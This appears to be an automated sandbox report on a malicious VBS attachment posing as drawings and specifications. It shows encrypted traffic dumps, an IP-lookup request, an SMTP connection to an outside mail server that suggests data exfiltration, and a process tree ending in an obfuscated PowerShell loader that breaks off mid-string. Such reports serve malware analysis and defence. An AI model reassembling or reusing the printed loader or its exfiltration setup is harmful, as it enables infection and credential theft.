                            2023-03-13 13:10:20 UTC157INData Raw: 4e d2 80 92 e8 93 e4 65 04 dc f2 26 e1 3c 60 be 26 39 64 b0 3b 65 88 37 82 1d 40 f7 de 53 4d 0b ef 79 51 f5 3f ea fd dc 8b 67 06 e9 c2 8e 9d dd ce 31 71 c1 05 d1 53 c0 96 19 0b 63 61 a6 0a 07 60 7a a2 bf 60 e4 79 2d 8c ba 03 c2 ec f8 a6 c5 3c 22 03 d7 2e 50 b9 f6 07 c7 ff 5b c0 3a 6a 8c ec 74 ad d1 bd 59 33 55 50 1d cb 9a c5 b7 3b 08 b6 eb dd 9f 7a bc e0 55 3a 90 1e ef a1 58 91 44 5f ee 54 2f 33 05 ef 1f 1c 0f 7d b4 ea 5a fe 2e ba ea cb 71 11 05 e7 21 cd ac cf 07 3d 40 02 8d 6d de c0 b1 be dc 47 e2 9e 15 26 71 8f 3f fa 44 0c 05 08 45 00 38 32 77 35 0c 75 22 34 31 eb f0 0d fd de 26 ce ee a3 f4 21 a9 d8 c6 0f 80 28 46 82 f6 3b cf f8 b3 8a 08 e4 25 5f a6 c1 2c 2a 06 91 7e 03 78 dd e5 79 db 78 76 46 08 21 56 24 8e 72 11 54 f6 bc 59 3f 16 7d 00 1c b9 60 69 7b
                            Data Ascii: Ne&<`&9d;e7@SMyQ?g1qSca`z`y-<".P[:jtY3UP;zU:XD_T/3}Z.q!=@mG&q?DE82w5u"41&!(F;%_,*~xyxvF!V$rTY?}`i{
                            2023-03-13 13:10:20 UTC158INData Raw: 4d ce 26 22 cf 21 b4 d4 6c f4 39 02 22 ab 02 61 c8 86 45 7b da e2 f0 72 c9 27 5e 95 9c ae ef be 45 3d 3a 02 f5 1b 2a ef 40 e0 25 68 4d 3f 68 41 39 a3 1d 10 dc 7a 8f 06 45 ba a5 7a 60 4f c2 f6 d5 d0 6a 97 cc 4b e1 ef 32 f2 99 8d dc 57 6b 17 a9 0e c2 31 34 15 50 f0 75 5f 7e 66 5e 83 94 1e eb 0d 2a 66 dc a5 3b 2f 82 66 0a b6 d9 af bd d9 21 92 9b 1e d1 4b 2b a5 18 e3 ae a6 cc 55 42 b4 b1 c8 3f da 56 20 a1 3c 91 4e f0 9b 99 d4 bb 55 db e9 4f fc c2 c5 cb b7 cb 8d f4 53 4f 3e 6a 04 10 b9 32 8d f7 f8 e6 0b 9c 60 c1 dc d0 74 14 03 61 32 b7 11 63 b5 0b 4c 66 1c f3 06 b3 f5 48 79 00 31 82 09 97 1b 7d 2e 75 d6 ca bf af 85 be dd 7a 0e 31 14 cb d3 bf 46 81 e6 b4 01 fd 30 2c 7d d8 d6 a6 9c b9 f8 7f 8d 52 08 cb cb 96 7c e7 10 72 54 28 a5 10 02 51 dd 40 fe 23 ba 55 67 8e
                            Data Ascii: M&"!l9"aE{r'^E=:*@%hM?hA9zEz`OjK2Wk14Pu_~f^*f;/f!K+UB?V <NUOSO>j2`ta2cLfHy1}.uz1F0,}R|rT(Q@#Ug
                            2023-03-13 13:10:20 UTC159INData Raw: 1d 88 1b 25 d7 de 48 76 0a bc 4e 51 f9 2c ea e7 c9 9c 06 11 e4 df b2 91 cb db 35 73 dc 0d d0 49 83 a2 07 18 63 7e a6 64 30 4e 7f a2 85 74 d3 18 0b 9f ab 36 ed ea ff 84 d4 26 3d 02 b9 14 5b cf d0 0e da c9 71 c3 2f 77 83 eb 78 c2 fc 94 4e 23 55 20 2d cb 86 db d8 09 1f d1 ce d1 88 67 ad a5 7f 3c 83 0b e9 bb 52 ff 07 4a ee 41 04 05 71 c3 1e 05 08 50 b2 f8 4a f8 03 af f2 c7 79 1e 71 d1 58 f9 bd de 21 76 6b 15 8c 78 c5 c9 87 e4 fe 5c e9 ed 26 31 64 ad 34 e6 73 3d 1c 19 43 75 08 3e 74 3e 78 43 56 21 3d f1 c8 0d f3 dd 01 dd f5 be e2 4e 94 8c ce 35 9c 3f 51 8d 92 28 ce e2 c1 a1 05 91 12 55 a6 c6 2c 47 35 97 7f 16 6b e8 e5 43 d1 0a 54 5d 1d 3c 43 3f fa 61 17 36 e1 a7 3c 5c 3e 08 20 15 99 73 78 4a c3 86 4d b2 ae 40 ea 72 5b bf be 8d ea 92 fb 5c 6a 0e cd 16 61 da b8
                            Data Ascii: %HvNQ,5sIc~d0Nt6&=[q/wxN#U -g<RJAqPJyqX!vkx\&1d4s=Cu>t>xCV!=N5?Q(U,G5kCT]<C?a6<\> sxJM@r[\ja
                            2023-03-13 13:10:20 UTC160INData Raw: 17 de 4e 13 ac 8b ae d4 a2 79 2f 3c 45 cd 15 0c f4 48 8c 32 7b 57 56 49 05 7d 85 01 79 fb 75 fc 67 7c c3 b4 64 05 41 86 a4 c4 d4 1e bc ca 2e 8c cd 5c c2 97 ff d2 4c 38 10 b0 78 ea 21 28 08 33 e0 6d 40 66 61 52 ce ad 6b d1 0b 22 65 ca ed 17 32 82 50 0a b4 dd b1 ac d0 3c 87 99 7d e0 4a 4a 8c 0e f1 88 ba d2 63 4f b5 b1 c6 4c be 5a 45 b2 06 a6 79 da 96 93 c9 b1 54 d5 9a 1b d0 d0 da a8 9d c2 fe b7 78 2a 0e 42 6d 23 b0 3d 96 fb c2 c8 02 80 02 c7 d5 a4 6d 36 14 6b 0a 95 0f 78 be 0f 53 66 14 ea 04 a1 f3 4d 50 6e 09 8e 0f 8f 1a 62 20 58 d0 f9 ba b8 82 ab d6 77 07 42 50 e9 d5 a2 6d 89 e6 d1 21 84 06 36 6d d8 a8 87 96 b9 e8 7e 97 6b 1e 81 ee 88 70 fa 73 55 51 24 ab 75 03 67 dd 66 db 28 bd 30 52 9d 76 9f f1 01 c3 9a dd 19 42 f0 9d 74 52 2c 3f 25 85 34 8f dd 1b 11 ca
                            Data Ascii: Ny/<EH2{WVI}yug|dA.\L8x!(3m@faRk"e2P<}JJcOLZEyTx*Bm#=m6kxSfMPnb XwBPm!6m~kpsUQ$ugf(0RvBtR,?%4
                            2023-03-13 13:10:20 UTC161INData Raw: a6 d6 d6 24 03 ef 01 cb 77 e2 91 10 11 62 13 a4 6f 30 5e 49 a3 b8 60 e4 17 11 f8 9e 1c fc e7 ee f4 c7 2a 26 33 fa 32 40 d7 c5 62 d4 c8 4a ec 1e 6c 81 f4 52 c2 e7 bf 42 40 43 35 2d fd a0 c1 bd 3a 0c c2 d2 d3 83 4a b6 95 69 2b e6 39 de a0 44 e1 73 69 ee 56 29 2f 75 d6 6a 32 38 66 ae fb 5d cf 04 bc f4 d7 66 04 71 d6 53 e3 a4 e8 38 39 4b 14 e2 4f c3 ca 94 af cf 47 87 ed 37 37 5a 94 35 f1 63 78 37 13 52 74 7c 14 7a 23 0c 10 6a 27 20 ef f8 2b fe e2 14 cd f2 b2 e2 55 fa d4 ea 37 a6 35 47 86 de 13 c8 f8 c1 b7 05 dd 38 49 d2 82 30 22 02 a7 5a 09 79 ee 80 5e fd 78 72 56 08 2b 63 39 9b 6c 0b 74 fa 80 53 4c 25 08 1a 1d 8c 4b 49 60 c1 87 47 a4 93 2e cb 78 2f b2 b2 91 e4 99 d3 40 68 2d ac 29 67 c3 a9 c6 b7 5b 20 8f 03 0d 01 31 3a 08 3a 3b a6 f7 da 29 20 bf 9b 9b 50 66
                            Data Ascii: $wbo0^I`*&32@bJlRB@C5-:Ji+9DsiV)/uj28f]fqS89KOG77Z5cx7Rt|z#j' +U75G8I0"Zy^xrV+c9ltSL%KI`G.x/@h-)g[ 1::;) Pf
                            2023-03-13 13:10:20 UTC163INData Raw: 1c 65 0c e3 70 11 90 15 8f 66 2e ab ca 13 60 2c a9 f5 91 ba 6b d1 a6 4b a2 84 31 b0 e0 d1 be 3a 79 15 c1 08 91 5b 49 7b 33 a1 31 36 32 06 3e fc e7 18 9f 7e 59 29 bd da 51 5d ee 21 71 f1 b0 c4 fb bb 53 ff e1 33 8d 3a 4a cb 65 80 c1 d6 af 19 20 df d2 a2 3d b0 39 20 c7 57 eb 15 b3 fb f6 89 da 30 b0 f8 36 99 91 af c5 fb a2 8d
                            Data Ascii: epf.`,kK1:y[I{3162>~Y)Q]!qS3:Je =9 W06
                            2023-03-13 13:10:20 UTC163INData Raw: b6 31 52 74 03 04 53 d4 50 ec 82 b7 a4 72 e1 3f a1 a2 51 0e 74 27 16 fb cc 68 1d 92 6b 32 e7 6d 9a 73 d5 8f 14 14 12 fe db 7e c0 74 07 4d 16 a4 ba ca 8f ea d9 b4 1c 77 20 15 af a2 57 17 e4 aa b4 41 84 46 78 19 a7 b9 fb fa fa 8d 0f e7 06 71 eb 9f c4 15 9b 32 1c 23 4a db 39 6c 31 a1 1b 97 4d d3 35 10 d8 03 cd 99 66 8f ff a0 59 2d 93 f6 09 57 79 58 59 ef 7d e1 b7 59 7a a2 74 6c 85 41 18 ab ce fb 6a 1f e2 b0 ce 87 14 d3 a9 ce 44 d5 8b 93 50 22 2c 04 09 06 03 f9 37 13 d9 88 06 fa 03 3e 03 e4 2d 8f 2a 49 19 c8 b5 d3 31 d1 88 1a c7 db a0 04 a7 16 3f 1d a9 f9 87 ef ca a8 4d d6 1a 0d ff 79 75 77 8f 33 1c 76 6f be c7 59 b2 84 8d 4f ea b4 ef ff d5 69 80 94 b2 3b 4f 3f 39 f7 17 86 39 de 8f f4 bf 8f ce c5 97 da a8 05 25 de f6 a5 24 a0 b4 6b c8 7a 3b 88 f8 fa 8a ff f6
                            Data Ascii: 1RtSPr?Qt'hk2ms~tMw WAFxq2#J9l1M5fY-WyXY}YztlAjDP",7>-*I1?Myuw3voYOi;O?99%$kz;
                            2023-03-13 13:10:20 UTC164INData Raw: 64 6f 22 04 5c 57 08 51 72 30 23 52 41 8d 2e 4b 9d a3 71 f3 80 f0 84 33 c7 8d 95 da d4 48 a2 ea 9a 72 a9 e1 c9 fb 62 89 44 28 27 8f 41 56 17 f6 1a 7a 1b fb 98 1f a6 12 1f 2e 75 57 72 41 9b 12 1d 2e 91 ad 24 27 43 6d 75 6a 9d 0c 13 07 a2 f0 a9 ed f2 3c 0d 10 59 e8 b6 e6 93 e4 8f 33 1e e0 f1 48 00 b3 dd c6 c2 bf 45 d5 70 79 72 de 57 61 5d 4d 68 8f ac 48 34 c5 9c c8 37 13 74 d3 bd 82 3d 16 00 f1 0c cc 44 b3 c4 d3 b2 c8 03 12 c1 b0 fb aa 8f 5a a6 ba c9 20 24 96 ab 22 94 ae 3b 0c 36 76 16 12 b4 c4 42 e4 0c 8c 23 ae e1 ad ff 01 49 8d c9 a8 0a 99 61 12 77 b2 0a 3a 7c b6 3e cc 38 78 2f 23 1e c9 99 8c a7 aa 28 07 7e 4a 65 51 dc 46 88 bc 0f bd 15 de 94 05 eb f2 b0 1d c9 7a 3e aa 42 93 79 a4 eb 11 b2 bd f9 ed 73 77 f3 6d ff 57 ec e9 91 1e fb a9 11 20 6d 5f a7 23 f7
                            Data Ascii: do"\WQr0#RA.Kq3HrbD('AVz.uWrA.$'Cmuj<Y3HEpyrWa]MhH47t=DZ $";6vB#Iaw:|>8x/#(~JeQFz>ByswmW m_#
                            2023-03-13 13:10:20 UTC165INData Raw: 68 71 34 11 d9 64 32 e7 18 9c 69 c5 80 2c 1b 12 fe db 68 f2 49 0e 57 b7 98 b2 d5 c2 e3 cd 94 19 70 b0 19 a0 b2 df 3b e1 88 b5 42 99 5d 58 10 b6 f2 f4 fc d6 8a 05 ea 28 6c eb 95 ea 08 87 7b 13 2e 4e cf 0d 7f 3a a7 02 b9 45 c6 34 12 fa 0c c4 a3 64 87 ea b6 6a 22 8f 79 3b 5c 6c db 05 f3 f4 a2 a3 d6 39 aa 64 ee 16 5e 0a bb 49 cf 73 0d 63 e3 93 9c 06 51 e6 c8 42 dc af 92 4c 38 a3 46 07 00 3b fe 2a 02 50 d1 12 9b 0a 28 82 78 2b b6 28 44 0d d8 95 d7 26 50 b6 1d c0 dc a7 0a b1 95 3a 0e b2 71 8a e8 da 03 79 c2 00 38 fe 6f fd 53 9f 3b 5a 76 7c ac f8 50 b8 15 b9 56 e4 bb e5 76 e5 7c 95 a1 ba 20 d3 06 36 b8 17 87 3b d8 90 eb ad b4 c7 d9 18 e8 b4 56 ac 99 e8 b7 ad eb a7 7c 9b f3 17 9c e6 fb 92 e6 e3 21 76 b4 90 c6 e2 44 65 ff de e3 1e c8 53 43 ce 78 f0 6a c1 d2 89 26
                            Data Ascii: hq4d2i,hIWp;B]X(l{.N:E4dj"y;\l9d^IscQBL8F;*P(x+(D&P:qy8oS;Zv|PVv| 6;V|!vDeSCxj&
                            2023-03-13 13:10:20 UTC166INData Raw: 29 f2 89 87 59 e6 52 2d f9 95 76 b5 99 d3 de 6b 83 d0 06 a8 9f 46 4f 7e e5 17 7b 0f 87 8e 1f ac 8b 2b 3a 69 45 16 58 ff 08 7f 30 8d c6 3f 31 59 00 77 7f f5 09 18 1b 2d 3f 35 d4 fa 2b 91 18 46 fc ca ed 94 77 0f 20 8d 14 d0 55 1a 37 60 c8 d8 34 54 d3 51 6b e1 72 4c e8 65 57 ef a2 af 44 50 d6 9e cf 32 1b 72 c1 93 82 2a b7 3d fd 0d 4d 0a 9d d7 41 8f d5 16 06 60 d4 f8 b7 9a 58 20 b0 c5 20 24 96 a8 9e f0 be b4 3e 23 72 19 1c a0 c1 5c fc 0a 8a 23 b7 65 b4 f3 1b 49 8b c1 a6 1d 8d 41 16 6d 36 36 30 60 bf 31 e2 2a 64 07 30 31 49 b7 03 86 aa 2e 07 7e 26 65 59 d2 4a 9b bc 0f a1 91 e2 80 0a d3 fd a8 bc f4 67 39 90 4b 93 79 e9 eb 04 34 3b f6 c1 7c f3 8e 74 7e bd e3 6d b5 13 ed 8c 03 a0 5a 1b b5 a0 83 ac ed 5a 55 22 67 c3 10 4d a7 86 25 1a c7 84 91 74 ad 4f 43 c0 fa 91
                            Data Ascii: )YR-vkFO~{+:iEX0?1Yw-?5+Fw U7`4TQkrLeWDP2r*=MA`X $>#r\#eIAm660`1*d01I.~&eYJg9Ky4;|t~mZZU"gM%tOC
                            2023-03-13 13:10:20 UTC168INData Raw: 33 b9 aa d3 d7 ee d7 b1 06 67 2c 55 b3 b5 cb 2e fd 8f bc 5e 84 47 45 1d a8 fd e8 fc c7 88 10 e1 37 76 e2 86 e1 08 8c 61 99 05 54 cc 02 f0 b0 b4 1a bf 43 ce 35 08 fd 1f c9 99 66 95 fa b9 52 3e 98 ab 00 4c 63 5f 56 60 25 fe b4 4a 7d b6 f7 03 91 d1 70 a7 da 72 3e 02 e7 b0 1a f5 09 d5 ba c5 57 de 92 96 4c 2f 3f 02 14 03 15 e3 32 02 50 dc 01 aa 8a c3 01 eb 2b 85 ae 25 0a 4b dc cb 31 cc 8f 01 4f a6 bb 85 d7 09 22 15 b1 b5 96 f3 d9 03 bc d5 1c 0b f7 76 69 7d aa 20 48 6f e8 47 c7 5f a4 9f 90 5a af b4 e2 e6 58 90 85 92 b5 35 47 2b aa 4f 1d 81 2f cf 9d fb aa 9b fb ca 97 c6 3b 15 3f 51 47 b7 65 aa 88 7e 91 67 39 bc e9 e1 1b ca ea 3b 6e bf 90 c6 8e 4b e1 60 4d cb 7c dd 58 45 c5 4a 71 0c 5d a2 b7 24 17 76 3d 79 3e 85 41 9b 86 a0 fc e6 5d 91 b8 d9 dc b5 98 51 11 29 35
                            Data Ascii: 3g,U.^GE7vaTC5fR>Lc_V`%J}pr>WL/?2P+%K1O"vi} HoG_ZX5G+O/;?QGe~g9;nK`M|XEJq]$v=y>A]Q)5
                            2023-03-13 13:10:20 UTC169INData Raw: cb f6 1a 6f 0a 99 8e 0a bb 17 12 2f 68 48 10 55 e8 81 c5 2b 86 da bd 82 4c 0d 61 72 f8 17 00 0c b1 e7 35 d4 fa 2b 88 1b 49 7b 96 e3 a6 f2 b3 20 8e 20 d0 55 15 b3 d5 ce d7 3b 49 d5 58 71 68 57 5d 63 49 57 e3 92 af 5b 4b cb 8b f6 35 0c 67 da a9 85 25 33 09 fb 17 c4 4a 95 e5 c2 ae de 0b 19 ed c2 fa d1 8f 2b a1 88 c7 1f 2a b1 b9 14 92 ba a7 35 36 7d 03 1f b5 cc 49 fc 22 83 30 ba 62 b5 f3 03 4c 82 da a3 16 84 5b 1a 7d 2b 2e 2f 6b a0 b8 5a 30 6f 1a 2b 04 4c a5 83 bb bc 2e 35 fa 6b 68 4a d9 59 90 af 04 ae 15 c3 90 1c ce fd b2 25 cf 68 28 8f 4a 9c fd 90 e3 36 b6 a6 ea e6 60 7f fc 61 e2 51 f9 f4 91 1e ef b1 1d a4 40 5e 87 22 ee a5 71 b2 40 1a 61 c5 06 08 a8 9b 22 1a dc a1 9b 6f a8 56 50 d6 ef d6 b3 cc 13 54 4d 63 86 79 62 9c 2c e8 6d 07 21 37 22 2c 19 e1 6a 15 85
                            Data Ascii: o/hHU+Lar5+I{ U;IXqhW]cIW[K5g%3J+*56}I"0bL[}+./kZ0o+L.5khJY%h(J6`aQ@^"q@a"oVPTMcyb,m!7",j
                            2023-03-13 13:10:20 UTC170INData Raw: 05 a7 78 40 eb 5a 38 10 f6 a6 c4 ed 93 e3 15 88 6e 09 a4 fc c7 15 71 34 bb 9d 76 5b c9 37 1b ea 80 09 96 e1 0d ed 26 2a 2d 88 ea 85 d3 7f 48 c6 9c 7d e6 91 57 6a 26 bf 69 a3 51 16 2b 05 fd 60 18 e4 b0 19 44 1a c2 25 bd 44 c9 0d 42 59 2f 02 07 1b 84 ca fb 17 10 c3 12 99 bf 0b 3b 01 f9 2d 90 2b 54 1d d8 e9 de 3c d6 8a 11 c0 c0 2b c5 ad 3c 20 0e b1 72 42 f4 4a 5b 57 55 cf 17 7d 9c 6e ed 2e 33 df 9b 7b 3c 2c 43 83 86 ac 5a 68 58 e6 75 34 78 05 71 aa b0 bf 32 2d 96 1f 92 33 5d 47 f9 9f 8b c7 d9 1b 35 b0 41 2d d0 f4 27 dd a7 9a 79 98 f0 c6 84 c8 f1 9b fe ec 22 6d a3 00 a6 9b 59 61 ff dd a3 02 57 a3 4e cb 58 e2 fa fd ab 8a 22 18 75 3e f4 32 02 a5 8f 0a 7b e5 47 62 8d a4 9c c6 31 01 42 81 4d 40 b8 29 91 61 88 6d 94 ee d1 89 45 1c 0f c4 e3 00 02 7c 77 7b c7 61 16
                            Data Ascii: x@Z8nq4v[7&*-H}Wj&iQ+`D%DBY/;-+T<+< rBJ[WU}n.3{<,CZhXu4xq2-3]G5A-'y"mYaWNX"u>2{Gb1BM@)amE|w{a
                            2023-03-13 13:10:20 UTC171INData Raw: 38 52 19 e8 ac e5 17 00 0a aa e2 2a da fa 2b 84 1b 5b fb db f5 83 fe b4 32 0e 6c d0 55 00 b1 fd c4 d1 30 46 51 b4 68 67 57 4c e8 a0 56 e0 9f ab 48 d4 1f 86 ed 28 11 6f d4 ae 82 2a b7 e1 ee 1a cb 62 91 c4 c9 a1 5a e7 14 e6 b0 f3 bd af 4b a0 b4 cb 29 2f 91 38 f3 9c ad 3b e4 36 7d 16 12 bb d1 53 c4 03 90 ac 63 67 a1 e0 3b 4d 91 46 7a 15 ab 5d 12 70 21 0b 33 7c 30 e5 c9 2a 6f 00 a3 fc 41 ac 90 3b 78 28 12 ff 77 7f d6 2c 59 90 bb 21 b3 05 cc a8 19 fc 7d 66 37 cf 6a 24 8a 46 89 ea 19 39 1e b1 b8 f5 69 96 76 fd 77 7e a8 f5 ea 9d 99 e6 a8 06 b0 ca 52 a3 27 e7 3f 64 b3 56 13 e4 ce 06 06 b0 04 37 16 dc 90 1b 66 a9 48 4f 47 f0 d8 bd c0 94 69 5a 6c 90 73 7a 9c 2c e8 72 14 2b 3e 6f 3b 3c e8 75 12 90 0e 8e 67 2e ba 93 12 76 7b da 97 c1 f4 05 bb e2 33 c1 e1 42 c2 9b e2
                            Data Ascii: 8R*+[2lU0FQhgWLVH(o*bZK)/8;6}Scg;MFz]p!3|0*oA;x(w,Y!}f7j$F9ivw~R'?dV7fHOGiZlsz,r+>o;<ug.v{3B
                            2023-03-13 13:10:20 UTC173INData Raw: 34 cc 1f 80 4d fa 30 38 f8 3b cc e2 63 bf ff 94 57 0e 9d cc 07 64 7e 6d 44 82 75 ce b1 6f 78 c0 76 59 83 67 04 84 c8 95 6e 2e e2 93 9b e7 14 b1 a7 f8 4a ee 8f a6 51 19 22 3f 09 30 1b c9 37 3e d1 f5 14 c3 0b 5f 03 e5 25 97 2f 7d 18 c2 a8 d7 34 81 8a 61 ce bd a9 60 a3 61 27 63 a0 84 97 b0 c8 e7 45 a5 12 76 ff 14 7c 00 97 4f 5d 7e 69 8f c5 7f aa a4 85 65 ea 85 f7 d9 d9 59 87 9c bb 0a 52 32 2b b7 1f ce 21 ac 9a 8d bf ec c6 a6 99 b6 ba 28 2d a9 e6 85 2c f4 ba 1c 89 00 2b f2 e8 9a 9a 99 e4 48 6b b1 82 76 93 77 60 dd 5f 64 10 e5 56 65 cb 68 f0 78 40 48 11 9e 25 5b c4 60 4f a0 2a fb fa dd 87 08 0f b1 94 e0 fa 83 9a 70 66 c6 07 d0 43 ea 8d 12 42 34 46 97 4c 69 39 28 f6 b9 66 e0 17 01 99 a2 1c fb ec a7 d6 d9 2a 21 4e 86 63 38 b3 8d 03 c0 de 5b de 28 69 9b bf 69 c0
                            Data Ascii: 4M08;cWd~mDuoxvYgn.JQ"?07>_%/}4a`a'cEv|O]~ieYR2+!(-,+Hkvw`_dVehx@H%[`O*pfCB4FLi9(f*!Nc8[(ii
                            2023-03-13 13:10:20 UTC174INData Raw: b2 32 0c 61 cd 50 08 b6 dd c6 d0 3e 54 d0 50 79 60 5f 5e 69 48 5f e9 82 ae 59 55 cb 9b e8 35 12 67 d3 ae 83 38 36 01 f3 1f cc 42 93 c5 c0 b3 db 03 17 e1 b1 fa b9 8f 4a a1 bd c7 2e 2a 83 b9 1f 95 bc ba 30 2b 78 1e 1a bd c4 41 f9 02 82 2d bf 60 b4 f2 06 4c 83 c7 a6 1f 8b 5c 13 65 33 36 32 6e b1 39 c2 2d 6a 12 22 0c 48 a5 82 ba a4 20 15 ff 76 6d 57 dc 44 95
                            Data Ascii: 2aP>TPy`_^iH_YU5g86BJ.*0+xA-`L\e362n9-j"H vmWD


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.11.204980964.185.227.155443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            TimestampkBytes transferredDirectionData
                            2023-03-13 13:10:23 UTC174OUTGET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                            Host: api.ipify.org
                            Connection: Keep-Alive
                            2023-03-13 13:10:23 UTC174INHTTP/1.1 200 OK
                            Content-Length: 11
                            Content-Type: text/plain
                            Date: Mon, 13 Mar 2023 13:10:23 GMT
                            Vary: Origin
                            Connection: close
                            2023-03-13 13:10:23 UTC174INData Raw: 38 34 2e 31 37 2e 35 32 2e 33 35
                            Data Ascii: 84.17.52.35


                            Chrome Debug Log

                            SMTP Packets

                            TimestampSource PortDest PortSource IPDest IPCommands
                            Mar 13, 2023 14:10:29.798228979 CET5874981695.172.86.31192.168.11.20220-vps.primevisionuae.com ESMTP Exim 4.96 #2 Mon, 13 Mar 2023 13:10:29 +0000
                            220-We do not authorize the use of this system to transport unsolicited,
                            220 and/or bulk e-mail.
                            Mar 13, 2023 14:10:29.798670053 CET49816587192.168.11.2095.172.86.31EHLO 760639
                            Mar 13, 2023 14:10:29.814771891 CET5874981695.172.86.31192.168.11.20250-vps.primevisionuae.com Hello 760639 [84.17.52.35]
                            250-SIZE 52428800
                            250-8BITMIME
                            250-PIPELINING
                            250-PIPECONNECT
                            250-STARTTLS
                            250 HELP
                            Mar 13, 2023 14:10:29.815026999 CET49816587192.168.11.2095.172.86.31STARTTLS
                            Mar 13, 2023 14:10:29.831947088 CET5874981695.172.86.31192.168.11.20220 TLS go ahead

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:14:09:49
                            Start date:13/03/2023
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Drawings_and_specifications.vbs"
                            Imagebase:0x7ff65de80000
                            File size:170496 bytes
                            MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:2
                            Start time:14:09:51
                            Start date:13/03/2023
                            Path:C:\Windows\System32\ipconfig.exe
                            Wow64 process (32bit):false
                            Commandline:ipconfig /flushdns
                            Imagebase:0x7ff73d7f0000
                            File size:35840 bytes
                            MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Target ID:3
                            Start time:14:09:51
                            Start date:13/03/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff73a0b0000
                            File size:875008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:4
                            Start time:14:09:51
                            Start date:13/03/2023
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /k echo hell
                            Imagebase:0x7ff7817d0000
                            File size:289792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Target ID:5
                            Start time:14:09:51
                            Start date:13/03/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff73a0b0000
                            File size:875008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:7
                            Start time:14:09:51
                            Start date:13/03/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 